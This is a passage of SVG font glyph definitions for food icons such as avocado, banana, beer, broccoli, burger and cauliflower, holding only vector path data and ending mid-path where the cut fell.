<glyph glyph-name="arabian-coffee" horiz-adv-x="1000" unicode="&#xeb3c;" d="M302 83c-1-75 63-110 72-114 0-1 0-1 0-1l10-34 0 0c-5 0-8-2-8-5v-12c0-3 4-5 9-5h288c5 0 9 3 9 5v12c0 3-3 5-7 5v0l8 29h0s74 56 69 121c-34 15-69 69-92 127 2 23 7 57 23 77 24 31 97 116 87 166s-68 100-137 89c0 0 0-1 0-2-4 9-10 18-21 25-28 20-60 28-66 59 8 5 14 13 14 23 1 13-9 24-22 28 7 3 13 10 13 17 0 10-6 18-16 20l9 9-13 66-16-68 9-7c-9-2-16-9-16-18-1-9 5-16 13-19-13-3-22-14-23-26 0-9 4-17 11-23 1-8-1-21-11-28-16-11-73-22-76-70l-2-20s-134 42-190-47c145 3 199-145 185-200-14-56-42-121-113-179z m333 222c-1 12-2 22-1 31 5 72 4 173 4 173s1 6 0 15c17 3 77 8 100-48 25-60-35-115-103-171z" />
<glyph glyph-name="artichoke" horiz-adv-x="1000" unicode="&#xeb3d;" d="M442 280c17-7 31-20 47-32 4-3 9-2 11 2 37 57 93 90 158 111 5 1 7 6 6 11-2 7-4 13-6 18-15 46-27 93-55 133-15 21-32 25-55 12-8-5-15-10-21-17-56-56-90-125-119-195-2-4-2-12 0-16 7-15 19-21 34-27z m-1-311c32-3 64-4 98-6 5 0 10 4 10 9 6 35 4 67-3 99-13 61-40 115-80 162-29 34-61 32-80-9-13-28-23-59-26-90-6-57 12-109 54-150 8-7 17-14 27-15z m129 116c2-5 5-6 8-2 42 58 87 108 154 130 4 2 8 7 9 12 1 11 3 20 3 30 2 19 5 39 3 58-2 26-11 33-38 32-41-3-77-20-112-41-30-18-57-41-76-72-6-11-7-19 0-31 14-28 27-57 39-86 4-9 7-19 10-30z m226 128c-40 0-77-11-109-35-44-32-78-74-106-121-2-3-3-8-3-12 0-22 0-44 0-67 0-5 3-9 8-8 5 1 10 1 14 2 6 2 11 3 17 5 73 25 129 72 180 127 19 19 27 44 32 70 5 27-5 39-33 39z m-459 172c16-12 30-26 45-41 4-3 7-2 7 3 1 3 1 6 1 9-2 12-4 24-6 36-10 56-25 110-56 158-23 35-47 37-72 3-45-61-77-128-87-204-4-30-1-60 19-88 2-4 6-3 7 2 1 5 2 10 2 15 6 37 20 70 45 98 32 35 58 38 95 9z m-101-201c28-23 56-44 85-66 1-1 3-2 5-4 3-2 5 1 5 5 0 61 16 113 60 155 3 3 4 9 2 13-21 32-45 59-74 81-21 15-37 13-53-6-40-46-54-100-43-159 1-7 7-15 13-19z m552 318c-20 45-44 87-80 121-14 13-28 14-43 4-25-17-40-42-50-70-1-4 1-9 3-13 8-17 19-33 26-50 15-39 30-78 45-117 2-5 7-8 12-9 7 0 13 0 19-1 5 0 10 1 11 1 0 1 0 1 1 2 18 39 37 79 55 118 2 4 2 10 1 14z m-437 84c-5-12-8-20 3-32 10-11 17-26 23-41 12-35 22-70 32-103 1-4 5-5 8-1 22 31 42 67 71 94 30 28 33 52 17 84-14 28-27 56-42 83-8 13-21 14-35 5-36-21-60-52-77-89z m514-102c-3 8-9 18-15 20-7 1-17-6-22-12-36-38-54-85-72-132-1-3-1-9 1-11 17-27 16-57 13-87-1-9-2-18-3-27 0-4 3-8 8-8 17 2 34 3 50 4 5 1 11 4 13 9 33 62 47 180 27 244z m-487-499c-5 8-10 14-14 21-10 18-17 38-28 55-31 44-71 80-117 105-28 15-58 25-88 35-6 2-17 0-21-4-3-4-1-15 2-21 56-107 147-165 262-196 5-1 7 2 4 5z m105 712c-3-4-3-10 0-14 29-37 44-79 57-122 2-5 7-8 11-7 9 1 18 2 26 5 5 1 11 6 14 11 13 19 25 39 39 58 5 8 8 13 2 21-13 20-26 42-42 61-30 35-58 35-91 3-6-5-11-11-16-16z m-205-103c2-5 7-8 12-8h24c4 0 10 3 12 8 2 5 4 10 8 15 18 24 35 52 58 71 18 15 23 29 21 49 0 3 1 6 0 9-2 9-3 24-8 26-8 2-21-1-28-7-38-34-75-69-112-104-3-2-4-9-3-14 5-15 11-30 16-45z m-148-374c19-4 39-8 61-13 5-1 7 2 6 6-3 8-4 15-9 18-41 31-51 73-46 120 3 32-14 54-31 77-7 9-17 8-20-4-5-17-10-33-10-50-1-53 18-101 42-147 1-3 4-6 7-7z m526-240c-5-2-8-3-12-5-39-13-76-30-119-26-40 3-80 2-120 4-15 1-29 4-43 6-5 1-10 1-11 0-1-1-1-6 1-10 3-7 6-13 10-16 17-8 36-18 54-19 48-3 97-1 146-1 46-1 77 21 98 63 2 4 0 6-4 4z m1 681c3-4 11-9 16-8 18 3 34-2 47-14 15-14 28-30 40-47 9-10 16-22 23-34 3-4 6-7 7-7 0 0 0 4-1 9 0 2-1 5-2 7-16 59-52 105-95 147-14 14-28 28-44 40-6 4-18 6-24 3-10-4-10-31-3-41 12-18 23-37 36-55z m-491-211c24 50 50 96 94 125 4 3 6 8 4 13-8 19-16 37-24 56-1 4-6 6-10 3-49-40-83-136-70-196 1-5 4-5 6-1z m745-80c-13 0-16-8-19-20-9-40-20-80-30-120-3-12-6-24-10-36-1-4-1-9 1-10s6 1 10 3c32 19 55 44 55 85 0 9 1 17 1 26 0 21 0 42 0 62 0 5-3 10-8 10z m-462 332c7 1 13 1 17 5 22 21 44 42 74 51 5 1 5 5 2 8-28 22-49 26-71 17-36-15-34-42-31-74 0-4 4-7 9-7z" />
<glyph glyph-name="asparagus" horiz-adv-x="1000" unicode="&#xeb3e;" d="M603 333c23 3 46-1 69-3 7 0 13-2 20-2 3 0 6 2 9 3-2 3-4 7-6 8-18 9-35 17-53 26-5 2-11 3-17 6 25 17 55 21 74 47l0 4c-17-2-34-2-50-6-37-11-75-10-114-12-48-3-97-4-145-10-90-11-179-24-268-36-20-3-39-7-60-10l10-81 10 1c98 11 197 21 295 33 76 9 151 23 226 32z m158-60c-12 2-23 4-37 7 25 17 53 22 72 47-5 0-11 1-15-1-47-19-95-20-145-16-27 2-55-3-82-6-33-3-65-8-98-13-95-12-190-24-285-37-2 0-3 0-6-1 2-22 5-44 7-65 1-8 6-7 10-6 28 2 56 4 84 7 84 9 168 18 251 28 58 8 115 18 172 28 26 4 52 2 79-3 10-1 21 0 32 0 2 0 4 2 6 3-1 2-2 5-3 7-12 12-27 18-42 21z m-568 117c48 6 97 13 145 18 62 7 124 11 185 16 25 2 49 1 74 3 12 1 25 4 38 8 41 11 82 10 124 0 3-1 6-2 9-3 1 0 1 1 4 1-8 7-15 14-22 17-14 7-28 11-42 17-3 1-5 2-7 4 2 2 3 4 5 5 17 6 34 12 51 19 9 3 17 10 25 15 1 1 2 4 3 6-2 1-4 3-5 3-19-1-38-3-56-4-26-3-51-7-77-9l-101-7c-62-5-124-9-187-17-63-8-126-19-189-29-9-1-17-3-27-4 3-22 5-43 8-64 14 2 28 3 42 5z m453-17c6-4 11-8 17-12 8-4 16-8 23-14 25-22 50-12 77-3-29 40-73 58-117 29z m113-87c16-8 35-14 49-26 15-12 28-15 46-8 8 3 18 5 29 8-28 19-54 34-86 40-16 3-27-7-38-14z m47 147c14 2 28 5 43 8-34 39-82 51-114 30 19-12 37-24 55-35 5-2 11-4 16-3z m-28-82c8-1 18 7 28 12 7 4 15 8 23 12 6 3 6 8-1 11-12 5-25 10-38 15-2 1-6 1-7-1-10-8-19-17-29-25 1-2 1-2 1-3 8-7 14-19 23-21z m100 101c2 1 5 1 7 3 11 5 22 11 35 17-15 8-28 15-42 22-2 1-7-1-9-3-9-6-17-14-26-21 6-16 19-22 35-18z m17-141c-2 0-4-1-6-2-7-7-15-14-22-21 1-1 1-1 1-1 28-24 33-24 70 4-13 12-28 16-43 20z m-35 191c-18 5-35 10-52 14-2 1-5 0-7-2-5-5-10-11-15-17 27-24 51-23 74 5z m-93-99c1 2-2 6-4 7-17 3-33 7-49 8-6 0-13-8-21-15 16-6 29-12 42-17 7-2 31 10 32 17z m111-85c-19 3-36 6-53 9-11 2-16-5-20-15 14-5 28-11 43-14 15-3 21 10 30 20z" />
<glyph glyph-name="avocado" horiz-adv-x="1000" unicode="&#xeb3f;" d="M927 424c-20 92-84 142-168 170-40 13-82 23-124 28-88 10-173 27-251 70-60 32-124 29-188 15-44-10-58-5-77 38-5 0-11-1-16-2-21-30 12-38 24-60-33-18-57-46-64-85l5-45c14-23 31-46 42-71 15-36 29-72 37-110 9-40 7-84 18-124 34-127 108-222 235-269 135-49 263-22 381 55 90 58 140 142 151 249 2 16 4 31 6 47-4 31-7 63-11 94z m-421-445h0l0 0c0 0 0 0 0 0z m182 204l0 0-1 0 2 1-1-1z m194 160l-40-47c-84-79-188-108-300-115-83-6-165 3-240 42-38 21-73 51-104 81-28 27-33 65-30 102 1 55-21 100-59 137-42 41-41 84 7 118 79 56 169 66 254 23 90-45 183-70 282-82 65-7 126-28 179-66 74-53 91-126 51-193z m-165 161c-14 10-30 18-48 24-37 14-83 20-133 16-61-4-120-22-159-54l6 3c-40-29-63-66-59-103 3-31 24-57 57-76l-3 1c84-65 286-47 361 37 46 51 37 111-22 152z" />
<glyph glyph-name="baby-food" horiz-adv-x="1000" unicode="&#xeb40;" d="M215 79c-10-19-3-43 15-53l202-109c19-10 42-3 52 16l89 165-81 44c-13 7-17 22-11 35l2 3c7 13 23 17 35 11l82-45 30 56-82 44c-12 7-17 22-10 35l2 4c6 12 22 17 34 10l82-44 50 92-269 145-222-409z m546 515c-2 6-4 13-6 20-8 31 0 63 20 88 3 3 5 7 7 11 15 27 10 59-12 70s-51-1-66-28c-2-4-3-8-5-11-10-31-32-55-62-66-7-2-14-4-21-6-36-7-68-26-91-53l241-131c10 34 9 72-5 106z m8-136l-271 146c-9 5-19 6-28 3-9-3-17-9-22-18l-15-28c-9-17-3-40 15-49l1-1 270-146c9-5 19-6 28-3 9 3 17 9 22 18l15 28c10 17 3 40-15 50z" />
<glyph glyph-name="banana" horiz-adv-x="1000" unicode="&#xeb41;" d="M917 478c-16 27-38 44-49 52-1 1-3 2-4 3 4 11 29 75 46 119 8 20-8 42-30 40l-68-5c-18-1-32-16-32-34-1-39-4-108-20-162-15-50-43-94-79-131-59-60-143-104-250-129-59-14-118-22-178-25-30-2-60-2-90-1-3 0-38 3-61 6-13 2-25-5-31-17l-6-13c-5-12-2-27 8-35 26-22 83-64 170-103 48-21 102-30 156-34 90-6 223 3 347 84 56 37 101 83 135 138 33 54 47 103 53 135 8 41 2 78-17 112z" />
<glyph glyph-name="bbq" horiz-adv-x="1000" unicode="&#xeb42;" d="M695 145c84 58 106 146 102 193h-461c0-4 0-6 0-9 4-77 38-137 100-182 6-4 7-7 5-14-20-59-39-118-58-177-3-11-7-22-11-33 12-4 22-7 33-10 8 25 17 50 24 74 2 8 6 10 14 10 84 0 169 0 253 0 8 0 12-2 14-10 7-24 16-49 24-75l33 11c-12 38-24 74-36 111-12 37-24 74-36 111z m-254-123c11 35 22 68 34 103 63-25 125-25 189 2 12-35 23-69 34-105h-257z m143 730c-43 25-88 39-137 35-63-5-116-30-159-77-5 3-10 7-15 10 1 3 2 4 3 6 4 9 2 14-6 19-8 5-14 4-19-3-16-25-32-50-47-75-4-7-3-13 5-18 10-6 13-5 25 8 5-3 9-6 15-10-21-53-25-106-8-160 17-54 50-96 99-127 81 131 163 262 244 392z m-328-90c-5 4-10 6-14 9 7 12 14 23 22 35 4-3 9-6 13-9-7-11-14-23-21-35z m321-155c-20-20-26-47-22-75 3-22 19-46 36-53l-2 6c-1 2-2 4-2 6-13 40-11 76 20 108 14 15 22 33 25 53 5 31-11 66-37 79 0 0 0-1 0-1l1-4c18-43 15-83-19-119z m81-129c-1 3-2 6-3 8-11 32-9 62 16 87 5 6 10 13 13 21 14 31 5 64-22 81 0-1-1-1-1-1 2-3 3-6 4-9 9-30 8-58-15-83-5-5-9-11-13-17-17-32-8-70 21-87z m-125 111c17 31 7 70-20 86 0-1-1-1-1-1 1-2 1-3 2-5 12-33 10-63-16-90-8-9-13-21-16-33-8-26 4-54 25-67 1 1 1 2 1 2-1 3-2 6-3 8-9 30-8 58 15 82 5 5 9 11 13 18z" />
<glyph glyph-name="beans" horiz-adv-x="1000" unicode="&#xeb43;" d="M498 46c89-96 310-100 404-8 20 19 34 41 35 74h-477c15-26 23-49 38-66z m5 305c-28 29-60 58-96 77-81 42-167 55-256 25-37-13-68-34-80-77 152-37 302-74 453-111 8 33 1 64-21 86z m213-41c35-11 69-13 102 11-93 125-185 250-278 376-29-23-39-52-40-84-5-120 100-268 216-303z m-197-68c-152 37-303 74-454 112-8-39 5-69 27-95 49-60 116-89 190-103 59-11 117-10 173 16 30 13 54 33 64 70z m356 158c9 64-11 122-44 175-45 73-104 132-193 151-27 6-54 3-78-17 92-125 184-249 276-374 25 17 35 40 39 65z m-328-166c-6-3-11-11-13-18-6-27-24-45-47-58-7-4-13-9-20-14l3-7h468c-6 54-42 84-85 104-103 48-205 40-306-7z" />
<glyph glyph-name="beer" horiz-adv-x="1000" unicode="&#xeb44;" d="M772 427h-51v101c19 18 31 44 29 73-3 45-40 82-86 85-2 0-4 1-6 1-9 0-17-2-26-4-1-1-3-1-5-1-6 0-12 4-15 9-18 33-53 54-92 54-21 0-41-6-58-17-3-2-6-3-9-3-6 0-11 3-15 7-22 34-61 55-104 55-70 0-127-56-127-125v-1c3-7-4-11-10-11-2 0-3 0-4 0-7 2-13 3-21 3-2 0-3 0-5 0-31-2-57-23-66-53-12-44 15-85 54-94v-454c0-77 63-140 140-140h287c70 0 128 52 138 119 101 5 182 89 182 192v74c0 72-58 130-130 130z m-458-329c0-6-6-11-15-11s-16 5-16 11v206c0 6 7 11 16 11s15-5 15-11v-206z m93 0c0-6-7-11-15-11s-16 5-16 11v206c0 6 7 11 16 11s15-5 15-11v-206z m93 0c0-6-7-11-15-11s-16 5-16 11v206c0 6 7 11 16 11s15-5 15-11v-206z m93 0c0-6-7-11-16-11s-15 5-15 11v206c0 6 7 11 15 11s16-5 16-11v-206z m112 453c-12-13-29-20-47-20h-21l-242 1c-7 0-14-3-20-8-5-6-8-13-8-20v-55c0-10-9-19-19-19h-9c-11 0-19 9-19 19v55c0 15-13 28-28 28l-126 0c-13 2-25 10-32 21-8 11-10 26-6 40 5 18 21 31 41 32 1 1 2 1 4 1 4 0 8-1 12-2 4-1 8-2 12-2 14 0 27 7 33 18 5 7 7 16 5 25 2 53 45 95 99 95 33 0 63-16 81-43 9-12 23-20 38-20 8 0 17 3 25 8 12 8 27 13 42 13 28 0 54-15 67-40 9-15 24-24 41-24 4 0 8 1 12 2 6 2 12 3 18 3 2 0 3 0 5 0 31-3 57-29 59-60 1-18-5-35-17-48z m169-328c0-86-67-158-153-164v340h51c56 0 102-45 102-102l0-74z" />
<glyph glyph-name="bell-pepper-capsicum" horiz-adv-x="1000" unicode="&#xeb45;" d="M719 425c-27 12-55 17-84 12-25-5-47-16-67-32-6 5-11 10-17 15-29 21-60 36-97 39-50 4-91-16-126-49-13-13-25-31-32-48-18-42-18-87-15-132 3-46 5-92-1-138-5-44-1-86 27-123 22-31 50-54 90-56 59-4 104 22 133 72 3 4 5 8 8 12 7 10 10 9 16-1 11-19 26-36 44-49 45-33 128-35 162 32 30 59 47 120 49 185 1 32 4 63 4 95 0 26 0 52-6 76-11 46-46 72-88 90z m-149-320c7 38 18 82 21 126 2 45-4 89-6 133 27-19 15-208-15-259z m-289 252c14 48 43 81 92 98 5 2 9 4 14 6-2 2-2 4-3 5-20 18-59 38-97 23-16-6-34-9-51-10-44-1-77-23-93-63-16-39-16-79-11-120 8-64 28-126 51-187 17-43 46-78 82-110 1 2 2 4 2 5-11 31-3 62 3 93 8 42 11 84 4 127-6 45-6 88 7 133z m80 310c20 10 35 7 51-5 4-3 9-6 13-10 30-27 50-60 46-100-3-33-2-32-32-26-1 0-2 0-3-1-7-16-19-28-37-32v-28c64 11 121 1 167-44 20 8 39 17 58 25-2 15-4 30-7 46-2 1-7 2-10 3-14 5-27 11-34 23-3 4-6 7-10 12-2 11-3 26-6 40-15 95-69 161-161 199-35 14-71 22-109 17-9-1-14-6-16-14-11-31-3-59 15-85 24-35 36-39 75-20z m-34 9c-1 39-23 70-48 99 21-2 52-69 48-99z m510-148c-29 36-68 48-113 32-33-12-59-34-85-56-12-10-15-22-12-36 1-7 4-13 7-20 53 3 104-1 147-33 44-33 57-80 63-131 1 2 2 4 3 7 12 38 21 77 24 117 2 43-6 84-34 120z m-255-9c9-12 22-17 39-19 2 1 7 4 10 7 14 12 28 26 43 38 22 18 45 34 75 36 4 0 9 3 13 4-1 4-2 10-5 13-19 20-44 31-72 34-28 3-48-8-65-29-17-21-35-42-41-69-1-5 0-12 3-15z m-346-28c7 2 15 5 22 7 46 11 88 10 125-24 2-2 5-3 9-5v29c5 1 9 1 13 2 7 2 9 6 5 12-27 38-61 62-112 56-40-5-68-32-71-69-1-7 1-11 9-8z m207 42c12-5 17-1 19 11 6 36-8 66-32 92-2 2-6 4-8 3-30-11-56-28-77-51-5-6-3-8 3-12 12-6 25-14 35-23 13-11 23-25 37-40 3 5 6 9 8 13 2 9 6 10 15 7z m156 66c3 7 9 13 13 20 4 5 3 10-3 14-21 12-44 16-65 17 9-36 19-72 27-103 8 15 17 34 28 52z" />
<glyph glyph-name="birthday-cake" horiz-adv-x="1000" unicode="&#xeb46;" d="M907 0h-814c-17 0-30-13-30-29 0-16 13-29 30-29h814c17 0 31 13 31 29 0 16-14 29-31 29z m-71 329c-6 4-11 8-16 13l-38 36c-13 12-35 12-48 0l-38-36c-18-17-42-27-67-27-13 0-25 3-36 7-12 5-22 11-31 20l-38 36c-13 12-35 12-48 0l-38-36c-18-17-41-27-67-27-12 0-25 3-36 7-11 5-22 11-31 20l-38 36c-12 12-35 12-48 0l-37-36c-5-5-11-9-17-13v-175h672l0 175z m-672-192h672v-115h-672v115z m24 258l15 15c9 9 18 18 30 25 19 11 43 15 65 9 12-3 24-9 33-17 4-3 7-7 11-10l25-24c9-8 22-11 33-6 6 3 10 7 14 11l27 26c17 16 41 25 65 23 21-2 39-11 54-25l28-26c6-5 11-9 19-11 10-1 19 2 26 9 10 8 19 17 28 26 4 4 9 8 14 12 11 7 24 12 37 14 13 2 26 1 38-3 4-1 8-3 12-5 3-1 7-3 10-6 2-2 4-3 6-4 2-1 3-3 4-4l7-7 9-8c5-5 10-9 15-14 6-6 14-10 23-10v95c0 28-25 51-54 51h-137v51c0 12-11 22-24 22s-25-10-25-22v-51h-72v91c0 12-11 23-24 23s-24-11-24-23v-91h-72v51c0 12-11 22-24 22s-25-10-25-22v-51h-136c-11 0-22-3-31-9-15-10-24-26-24-42v-95c1 0 2 0 3 0 8 0 15 5 21 10z m192 232c16 0 30 13 30 29l-30 62s-31-46-31-62c0-16 14-29 31-29z m120 40c17 0 30 13 30 29 0 16-30 62-30 62s-30-46-30-62c0-16 13-29 30-29z m121-40c16 0 30 13 30 29l-30 62s-31-46-31-62c0-16 14-29 31-29z" />
<glyph glyph-name="bread" horiz-adv-x="1000" unicode="&#xeb47;" d="M795 495c0 0 0 0 0 0-6 3-13 4-18 0-6-3-9-9-9-15 4-53 0-101-4-131 0-3-2-5-5-5-3 0-5 2-6 5-16 81-48 151-68 190-2 4-6 7-10 9-52 14-101 19-131 21-5 0-10-2-14-6-3-4-4-9-3-15 18-76 13-161 9-204 0-2-3-5-5-5-3 0-6 2-6 4-15 51-48 157-80 213-4 5-10 9-16 8-44-4-87-10-125-27-7 0-12-8-11-16 11-70 6-135 1-173 0-3-2-4-5-5-3 0-5 3-6 5-11 53-27 101-43 139-3 6-7 10-13 12-6 2-12 1-17-2-102-59-147-128-147-199 0-150 195-168 437-168 242 0 438 18 438 168 0 65-41 129-143 197z" />
<glyph glyph-name="broccoli" horiz-adv-x="1000" unicode="&#xeb48;" d="M852 431c-20 34-54 49-91 54-20 4-40 4-60 5 57 18 105 1 150-35 1 3 2 5 3 7 24 52 8 101-30 140-12 12-20 23-21 41-3 31-15 59-38 81-32 29-71 37-113 34-2-1-4-1-6-2 23-33 39-67 29-107-6 52-22 98-73 123-51 25-98 21-140-19-70 34-136 21-161-31 50-34 66-55 60-75-7 11-14 25-24 36-29 31-72 42-109 12-15-12-27-28-38-44-19-27-25-59-18-90-38-37-57-92-44-146 14-58 50-96 106-115 5-2 10-2 10-11-5-61-14-121-46-175-18-32-40-61-61-91-11-16-10-30 5-39 39-23 78-46 118-68 14-8 27-3 34 12 3 5 6 10 8 16 22 57 57 103 100 142 41 38 82 60 84 58 1-2 2-3 3-4 36-39 79-57 132-53 32 3 63 17 87 38 34-2 69 14 94 40 25 27 32 59 28 94 0 6 0 10 5 14 16 13 29 28 36 47 14 41 1 77-19 111z m-565-184l-12-7s-16 80 0 78c17-1 18-3 17-17-1-14 6-46-5-54z m51-62c-17-25-25-18-18 16 6 33 20 53 30 44 10-9 4-36-12-60z m118-3c-17-13-33-25-50-37-28-21-36-17-19 8 10 15 20 30 31 45 2 3 6 5 9 5 9-1 17-3 26-6 3-1 6-5 7-8 1-1-2-5-4-7z" />
<glyph glyph-name="burger" horiz-adv-x="1000" unicode="&#xeb49;" d="M879 122h-758c-5 0-9-4-9-10v-57c0-33 27-60 60-60h656c33 0 60 27 60 60v57c0 6-4 10-9 10z m1 158h-760c-31 0-57-29-57-64s26-64 57-64h760c32 0 57 28 57 64s-25 64-57 64z m-759 93h758c5 0 10 5 10 10v1c0 101-40 185-115 241-69 52-164 80-274 80-110 0-205-28-274-80-75-56-115-140-115-242 0-5 5-10 10-10z m684 117c15 0 27-12 27-27s-12-28-27-28-28 12-28 28c0 15 13 27 28 27z m-106 81c15 0 27-12 27-28s-12-27-27-27c-16 0-28 12-28 27s12 28 28 28z m-87-81c15 0 27-12 27-27s-12-28-27-28-28 12-28 28c0 15 12 27 28 27z m-107 81c16 0 28-12 28-28s-12-27-28-27c-15 0-27 12-27 27s12 28 27 28z m-106-81c15 0 28-12 28-27s-13-28-28-28-28 12-28 28 13 27 28 27z m-87 81c15 0 28-12 28-28s-13-27-28-27-28 12-28 27 13 28 28 28z m-106-81c15 0 27-12 27-27s-12-28-27-28-28 12-28 28 13 27 28 27z m-123-191h834c11 0 21 9 21 20 0 12-10 21-21 21h-834c-11 0-20-9-20-21 0-11 9-20 20-20z" />
<glyph glyph-name="cabbage" horiz-adv-x="1000" unicode="&#xeb4a;" d="M556 288c-27 23-55 46-80 72-33 36-48 82-45 135 1 21-1 43-3 65-2 14-10 24-25 24-5 0-9 1-13 2-7 1-12 13-11 27 0 8 1 16 0 24-1 17-5 22-20 25-5 1-10 2-14 3-8 1-14 17-13 35 1 18-33 14-73-13-26-17-50-36-72-58-80-78-126-173-124-295 0-73 22-137 60-195 48-72 115-110 191-131 7-1 13-3 20-4 11-2 19-3 18-2-1 1-2 2-2 2-59 34-104 83-141 145-2 3-6 6-9 7-36 15-62 43-78 82-4 8-6 15-8 23-4 13-6 24-5 24 1 1 11-20 30-40 19-20 27 6 23 54-4 36-3 72 2 107 7 48 15 46 16-2 0-6 0-12 0-18 3-48 40-67 65-39 25 28 44 50 43 49l0-2c-17-51-44-96-77-135-3-3-7-10-6-12 12-30 25-59 38-88 3-5 6-9 10-13 5-7 37 12 64 47 26 35 43 45 35 21-5-14-10-28-16-41-6-14-13-27-20-40-11-22-7-50 10-62 11-7 21-15 32-22 15-10 17-10 27 6 14 22 28 45 41 67 2 5 5 9 7 13 3 7 5-17-8-51-13-35 6-82 49-91 26-5 52-6 78 0 30 6 56 19 77 45 35 44 36 124 2 175-21 31-48 52-75 75z m380 102c-6 60-28 113-62 160-28 40-62 72-98 102-14 12-27 25-41 37-23 20-50 20-48 0s-7-37-22-42c-8-2-16-7-23-15-7-9-10-18-11-28-1-17-30-26-41-50-12-24-21-43-35-44-8-1-15-4-22-12-7-7-11-16-12-25-3-16-12-24-26-22-9 1-17 0-25-3-14-6-16-10-10-25 2-4 3-7 5-11 20-39 51-67 82-93 31-26 62-50 87-83 26-34 39-72 36-117-1-8-2-16-2-24-2-13 22-9 47 16s15 83-6 126l-3 5c-21 44-10 54 15 21s55-47 59-37c3 5 5 11 8 17 16 30 16 58-7 84-3 3-5 7-7 10-15 20-30 40-43 61-4 6-8 13-10 21-3 12 15-1 38-28s53-28 55-9c1 12 1 24 0 36 0 12-1 24-2 35-2 20 12-1 19-49 5-34 5-68 2-102-5-48 6-76 25-55 18 22 29 24 22 2-4-13-11-25-21-36-11-12-23-24-36-34-29-22-54-48-76-80-12-16-23-33-36-48-22-24-46-37-45-37 0 0 1 0 1 0 77 17 144 52 197 119 57 73 81 160 72 257z m-540 261c1-7 2-15 3-22 1-13 19-22 32-35 7-7 12-17 15-30 3-17 4-34 4-52 1-8 1-16 1-24 0-14 11-22 25-17 14 5 27 24 45 44 17 20 44 21 45 25 0 3 1 5 2 7 5 20 16 35 34 40 8 2 11 7 12 16 1 15 4 28 11 39 12 19 0 46-47 56-40 8-87 11-129 6-48-6-73-25-63-34 5-4 8-11 10-19z" />
<glyph glyph-name="carrot" horiz-adv-x="1000" unicode="&#xeb4b;" d="M635 485c-17 13-37 16-58 9 11-26 21-52 31-77 3-7 5-15 7-22 0-5-1-10-2-15-4 3-9 4-12 8-9 13-18 26-26 40-9 16-17 33-26 51l-118-83c13-35 31-67 36-104-1-1-2-2-3-2-3 2-8 5-10 8-12 19-24 38-35 58-5 7-9 15-13 23-18-12-36-25-54-37-43-30-87-61-131-91-5-4-7-7-4-13 5-13 9-25 13-38 1-4 1-8 0-12-16 12-23 30-34 46-19-14-38-27-56-40-21-14-42-29-62-43-14-10-19-24-13-38 5-15 19-23 35-20 16 3 32 8 48 12-4 13-7 25-10 37l4 2c5-6 10-13 15-19 10-15 10-15 26-10 62 17 123 35 185 52 2 1 4 1 6 2-7 23-19 43-18 68 21-16 30-40 43-61 58 16 116 33 176 50-2 5-4 9-5 13-9 24-18 47-27 71-1 6-1 12-2 18l4 1c4-3 8-6 11-10 14-25 29-49 42-73 5-9 9-11 19-8 15 5 30 9 45 14 35 10 56 33 55 70-1 67-27 123-82 163z m288 7c-53-42-112-72-177-90 78 45 142 103 176 190-15 5-30 10-45 16-30-73-84-123-151-160 35 30 60 67 68 114-2 1-2 1-3 1-6 1-13 2-20 3-10-48-37-84-75-110 12-28 24-55 37-83 74 19 142 52 205 100-6 7-10 12-15 19z" />
<glyph glyph-name="cauli-flower" horiz-adv-x="1000" unicode="&#xeb4c;" d="M98 334c3 2 6 6 7 5 10-6 19 6 29 3-5 17-5 18-19 19-7 0-15-2-22-2-2 0-5 2-7 3 2 2 4 5 6 6 10 1 20 1 32 2 8-10 14-21 16-36 3-15 19-24 31-33 0 8 0 15 0 22 0 6 1 12 2 17 2 9-6 9-9 12-3 3-5 6-7 8-6 7-13 14-19 21-4 4-9 7-13 10 24-5 33-26 49-40 2 4 4 7 6 11-3 4-6 10-10 10-10 1-13 8-15 17-1 4-2 8-3 10-10 0-20-1-30 0-6 1-12 4-19 5-9 2-19 3-29 3-6 0-8-3-7-9 3-26 18-45 31-64z m-12 64c15-7 28-16 38-28-15 10-28 19-42 28 2 1 3 1 4 0z m130-323c1-2 9-3 12-1 14 7 26 15 41 23-7 10-14 21-22 31-6 7-13 0-19-2-5-2-6-6-4-12 4-9 2-18-7-24-6-5-2-11-1-15z m95 28c-7 10-14 20-21 29-1 1-2 1-4 2-4 2-9 4-12 7-12 11-24 22-35 34-4 5-7 6-12 5-5-2-10-2-15-2l-1 4c5 2 11 5 17 8-5 4-8 11-13 13-9 4-18 5-27 7 3-24 15-41 36-53 23-13 44-31 52-59 12 2 24 3 35 5z m612 76c1 16-1 32-13 46-8-25-26-39-45-52 6-6 12-11 16-18 3-5 6-7 11-8 6 0 12-1 15-9-2 0-4 0-5 0-11 7-16 0-21-8-3-4-6-7-10-12-5 12 5 16 9 26-23 2-30-19-44-30 0 16 14 20 19 32-4-1-7-2-10-2-3 0-6 2-8 3l0 0c-1-1-3-1-4-2-14-19-29-37-43-56 5-4 13-4 21-2 19 7 38 14 58 21 5 2 11 3 17 4 17 3 34 6 52 9-13 19-16 38-15 58z m-23-29c-9 9-6 22 8 37-1-14-16-22-8-37z m-59 159h-15s4-25-4-26c0 0 25-22 28-40l9 13-18 53z m65 34c-4-5-4-12-5-18 6 0 12 0 18 0l1-4c-5-1-9-4-14-5-5-1-7-3-9-9-4-16-10-31-15-46-2-5-6-8-9-12 0-2-2-3-2-4-2-11 0-37-2-49 11 3 18 21 30 25-6 29 5 54 20 77 13 20 16 40 9 63-8-6-16-11-22-18z m-45-34c-1-6-9-13-6-20 3-7 9-12 12-19 2-5 3-9 4-13 6 14 12 29 17 44 2 6 0 14-1 21-2 7-5 13-7 20l4 1 8-15h3c1 20 2 40 3 60l4 0c1-12 1-24 3-37 8 5 11 18 22 10-4 17-7 34-12 50-3 9-7 9-14 2-1-1-2-2-2-4-5-13-12-23-25-29-1-1-2-6-1-9 4-15 4-16-9-25-2-1-4-4-4-6 0-11 2-21 1-31z m-65-158c-2-1-5-3-6-5-7-10-13-20-20-29-4-6-8-10-14-17 9 2 16 5 20 3 5-2 7-1 9 2 6 4 11 8 15 13 12 14 22 29 33 44 1 1 1 3 2 5 2 6 3 12 6 17 3 7 7 14 10 22 6 13 6 26-7 36-6 5-8 14-17 16-2 1-4 6-5 9-2 3-3 7-5 12-4-7-6-14-11-18-7-5-7-12-8-19-1-6-1-12-3-17-2-10-5-18-13-23-7-5-14-11-20-17-3-3-8-7-9-11-2-9-5-16-17-14 0-7-1-13-1-19-1-14-5-25-17-33-6-4-9-10-13-16-1-1-1-3-1-5 4-12 8-24 12-36 2 4 6 8 8 14 5 11 7 25 22 29 1 1 1 2 2 3 8 11 16 23 25 34 16 20 16 29 4 51-1 2 0 5-1 8 3-1 7-1 8-3 4-5 